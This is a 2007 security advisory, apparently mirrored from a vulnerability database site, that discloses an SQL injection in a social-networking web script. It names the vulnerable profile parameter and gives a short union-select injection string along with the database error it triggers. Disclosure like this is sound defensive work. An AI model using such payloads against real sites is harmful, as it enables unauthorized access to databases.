Computer Security

Security Advisory: [Aria-Security Team] social-networkin SQL Injection
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  NuclearBB Alpha 2 Remote File Inclusion

  Husrev Forums v2.0.1:PoWerBoard Sql

  Proxy Anket v3.0.1 Sql injection Vulnerable

  phpMyQuote 0.20 Version Multiple Sql And Xss Vulnerabilities

From:Advisory_(at)_Aria-Security.net <Advisory_(at)_Aria-Security.net>
Date:11.09.2007
Subject:[Aria-Security Team] social-networkin SQL Injection

_________________________

A R I A - S E C U R I T Y
_________________________

http://www.social-networking.tv/
Demo: http://www.social-networking.tv/musicians/
http://mytarget/profile/myprofile.php?u=[SQL]

We will just provide an example to show the result when an SQL command is given

http://mytarget/profile/myprofile.php?u=[SQL]-
1/**/union/**/all/**/select/**/1/**/from/**/test

Result:
Table 'socialee_new.test' doesn't exist

-------------------------

Credits: Aria-Security Team
http://aria-security.net
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru